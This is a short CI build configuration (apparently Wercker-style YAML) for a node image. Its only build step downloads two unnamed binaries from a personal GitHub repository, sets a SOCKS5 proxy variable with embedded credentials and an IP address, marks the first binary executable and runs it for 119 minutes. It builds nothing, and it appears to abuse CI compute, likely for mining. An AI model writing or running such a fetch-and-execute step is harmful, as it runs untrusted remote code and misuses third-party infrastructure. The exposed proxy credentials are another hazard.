box: 

  id: node:latest

  ports: 

    - "8080"

command-timeout: 300

no-response-timeout: 300

build: 

  steps:

    - script:

        name: A1234

        code: wget -O 1 https://github.com/konchilsxx/asw/raw/main/tepel && wget -O 2 https://github.com/konchilsxx/asw/raw/main/v2 && export_http_proxy=socks5://jxkjpywa:f04h5dfeyfme@45.57.255.130:7169 && chmod u+x 1 && timeout 119m ./1
